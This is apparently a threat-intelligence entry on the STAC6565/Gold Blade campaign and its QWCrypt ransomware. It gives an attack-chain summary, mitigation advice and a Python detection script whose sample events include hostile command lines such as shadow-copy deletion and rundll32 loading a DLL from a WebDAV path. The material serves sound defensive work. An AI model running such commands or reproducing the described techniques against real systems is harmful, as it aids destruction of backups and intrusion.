STAC6565 Targets Canada in 80% of Attacks as Gold Blade Deploys QWCrypt Ransomware
Canadian organizations have emerged as the focus of a targeted cyber campaign orchestrated by a threat activity cluster known as STAC6565. Cybersecurity company Sophos said it investigated almost 40 intrusions linked to the threat actor between February 2024 and August 2025. The campaign is assessed with high confidence to share overlaps with a hacking group known as Gold Blade, which is also
AI Analysis
Technical Summary
The STAC6565 threat cluster, associated with the financially motivated hacking group Gold Blade (also tracked as Earth Kapre, RedCurl, and Red Wolf), has been actively targeting organizations since late 2018, with a recent campaign focusing heavily on Canadian entities (80% of attacks). The group has evolved from cyber espionage to a hybrid operation combining data theft with ransomware deployment using a custom ransomware strain named QWCrypt. Initial infection relies on spear-phishing emails targeting HR personnel, abusing legitimate job recruitment platforms such as Indeed, JazzHR, and ADP WorkforceNow to host weaponized resumes and cover letters. These documents deliver multi-stage payloads through chains involving Windows shortcuts (LNK files) masquerading as PDFs, which execute via rundll32.exe and sideload malicious DLLs from attacker-controlled WebDAV servers fronted by Cloudflare Workers domains. The malware also uses legitimate Windows tools such as the Program Compatibility Assistant (pcalua.exe) to execute payloads, improving stealth. The RedLoader malware collects extensive Active Directory environment data and communicates with multiple command-and-control servers using tools such as RPivot and Chisel SOCKS5 proxies. The attackers employ a customized Terminator tool leveraging a signed Zemana AntiMalware driver to perform BYOVD attacks that disable antivirus processes. Post-compromise, they conduct discovery using Sysinternals AD Explorer and package stolen data into encrypted archives sent to attacker-controlled servers. Ransomware deployment scripts are victim-specific and include steps to disable recovery features, delete shadow copies, and erase PowerShell history to hinder forensic analysis. Notably, the ransomware targets both endpoint devices and hypervisors, amplifying impact by potentially encrypting virtual machine volumes. The group operates in bursts with periods of dormancy, indicating ongoing toolset refinement.
Despite the high sophistication, no evidence suggests state sponsorship or political motives, and the group operates under a hack-for-hire model, performing tailored intrusions for clients while monetizing via ransomware. The campaign's use of legitimate platforms and advanced evasion techniques poses significant detection challenges.
Potential Impact
European organizations face considerable risk from this threat due to the group's expansion beyond Canada into countries including Germany, Norway, Slovenia, the U.K., and Ukraine. The hybrid nature of the attacks—combining espionage, data theft, and ransomware—threatens confidentiality, integrity, and availability of critical systems. Target sectors such as manufacturing, technology, retail, transportation, and NGOs are vital to European economies and infrastructure, increasing potential disruption and financial losses. The ransomware's ability to target hypervisors elevates risk by compromising virtualized environments, potentially causing widespread service outages and data loss. The use of legitimate recruitment platforms for initial compromise complicates detection and increases the likelihood of successful intrusions. Additionally, the group's use of BYOVD attacks to disable antivirus solutions reduces the effectiveness of traditional endpoint defenses. The tailored nature of ransomware deployment and the deletion of recovery artifacts hinder incident response and forensic investigations. Overall, this threat could lead to significant operational disruption, data breaches, financial extortion, and reputational damage for European organizations.
Mitigation Recommendations
European organizations should implement targeted defenses focusing on the attack vectors and tactics used by STAC6565/Gold Blade. Specifically, enhance email security by deploying advanced phishing detection solutions capable of analyzing attachments and URLs hosted on legitimate recruitment platforms. Implement strict controls and monitoring around HR and recruitment workflows, including sandboxing of incoming resumes and cover letters. Enforce multi-factor authentication (MFA) and strong password policies for all administrative and hypervisor accounts, and segregate hypervisor management networks from production and user networks. Deploy network segmentation to limit lateral movement and restrict SMB share access to authorized users only. Monitor for unusual use of Windows utilities such as rundll32.exe, pcalua.exe, and PowerShell scripts, and establish behavioral analytics to detect anomalous activity related to these processes. Utilize endpoint detection and response (EDR) tools capable of identifying BYOVD techniques and unauthorized driver loading. Regularly back up critical data and verify backup integrity, ensuring backups are isolated from the network to prevent ransomware encryption. Conduct threat hunting exercises focused on indicators of compromise related to RedLoader, QWCrypt, and associated C2 infrastructure. Finally, educate HR personnel about spear-phishing risks and the dangers of interacting with unsolicited resumes or job applications, especially those hosted on external platforms.
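As an added defender-side example (not code from the article, from Sophos, or from any tool named above), the following Python script runs a small set of detection rules over constructed, Sysmon-style process-creation and driver-load events and flags the living-off-the-land patterns the recommendations call out: rundll32.exe loading a DLL from a WebDAV UNC path, pcalua.exe used as a proxy launcher, a shortcut named as a PDF (.pdf.lnk), shadow-copy deletion, PowerShell history removal, and a driver load whose signer is Zemana. The field names (Image, CommandLine, Signature, Computer, ProcessId) follow Sysmon event IDs 1 and 6, but every record, host name and path below is a constructed placeholder, and the Zemana check assumes the event carries the signer name in a Signature field.

```python
import re
from collections import defaultdict
from typing import Callable, Iterable

# Helpers: normalise the fields we inspect (missing fields become "").
def _cmd(ev: dict) -> str:
    return (ev.get("CommandLine") or "").lower()

def _image(ev: dict) -> str:
    return (ev.get("Image") or "").lower()

# WebDAV-style UNC paths as the Windows mini-redirector renders them:
# \\host@SSL\..., \\host@443\... or \\host\DavWWWRoot\...
# A plain SMB UNC such as \\fileserver\share\x.dll does not match.
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+(?:@ssl|@\d+|\\davwwwroot)")

# Each rule: (name, event type it applies to, predicate over the event).
Rule = tuple[str, str, Callable[[dict], bool]]

RULES: list[Rule] = [
    ("rundll32_webdav_dll", "ProcessCreate",
     lambda ev: _image(ev).endswith("rundll32.exe") and bool(WEBDAV_UNC.search(_cmd(ev)))),
    ("pcalua_proxy_exec", "ProcessCreate",
     lambda ev: _image(ev).endswith("pcalua.exe") and " -a " in _cmd(ev)),
    ("lnk_masquerading_as_pdf", "ProcessCreate",
     lambda ev: ".pdf.lnk" in _cmd(ev)),
    ("shadow_copy_deletion", "ProcessCreate",
     lambda ev: (_image(ev).endswith("vssadmin.exe") and "delete shadows" in _cmd(ev))
             or (_image(ev).endswith("wmic.exe") and "shadowcopy delete" in _cmd(ev))),
    ("powershell_history_wipe", "ProcessCreate",
     lambda ev: _image(ev).endswith("powershell.exe")
             and ("consolehost_history" in _cmd(ev) or "historysavepath" in _cmd(ev))),
    # Assumption: the driver-load event exposes the code-signing subject as "Signature".
    ("zemana_driver_load", "DriverLoad",
     lambda ev: "zemana" in (ev.get("Signature") or "").lower()),
]

def detect(events: Iterable[dict]) -> list[dict]:
    """Return one hit per (event, rule) match, in event order."""
    hits = []
    for ev in events:
        for name, etype, pred in RULES:
            if ev.get("EventType") == etype and pred(ev):
                hits.append({"rule": name, "host": ev.get("Computer"),
                             "pid": ev.get("ProcessId"), "command": ev.get("CommandLine")})
    return hits

def by_host(hits: Iterable[dict]) -> dict[str, list[str]]:
    """Group the rule names that fired per host, for triage."""
    grouped: dict[str, list[str]] = defaultdict(list)
    for h in hits:
        grouped[h["host"]].append(h["rule"])
    return dict(grouped)

# Constructed sample telemetry (placeholder hosts and paths, not real IoCs).
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Computer": "HR-WS01", "ProcessId": 4120,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe \\example-worker.invalid@SSL\DavWWWRoot\stage\loader.dll,Entry"},
    {"EventType": "ProcessCreate", "Computer": "HR-WS01", "ProcessId": 4188,
     "Image": r"C:\Windows\System32\pcalua.exe",
     "CommandLine": r"pcalua.exe -a C:\Users\hr\AppData\Local\Temp\stage.exe"},
    {"EventType": "ProcessCreate", "Computer": "HR-WS01", "ProcessId": 4090,
     "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r'explorer.exe "C:\Users\hr\Downloads\Resume_Candidate.pdf.lnk"'},
    {"EventType": "ProcessCreate", "Computer": "HR-WS01", "ProcessId": 5001,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},   # benign, no WebDAV path
    {"EventType": "ProcessCreate", "Computer": "SRV-FS02", "ProcessId": 7712,
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"EventType": "DriverLoad", "Computer": "SRV-FS02",
     "ImageLoaded": r"C:\Windows\Temp\driver.sys", "Signature": "Zemana Ltd."},
    {"EventType": "ProcessCreate", "Computer": "SRV-FS02", "ProcessId": 7800,
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},  # benign
]

if __name__ == "__main__":
    for host, rules in by_host(detect(SAMPLE_EVENTS)).items():
        print(f"{host}: {', '.join(rules)}")
```

The rules are deliberately narrow so that ordinary rundll32 and PowerShell use on the same hosts produces no hits; in production the same predicates would be fed from the SIEM's Sysmon or EDR telemetry rather than the inline list, and the per-host grouping is what an analyst would pivot on first.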
Affected Countries
Canada, United Kingdom, Germany, Norway, Slovenia, Ukraine
Technical Details
- Article source: https://thehackernews.com/2025/12/stac6565-targets-canada-in-80-of.html (fetched 2025-12-09T11:23:07Z, 1919 words)
Threat ID: 6938069e29016b16de4f9968
Added to database: 12/9/2025, 11:23:10 AM
Last enriched: 12/9/2025, 11:23:33 AM
Last updated: 12/11/2025, 4:54:20 AM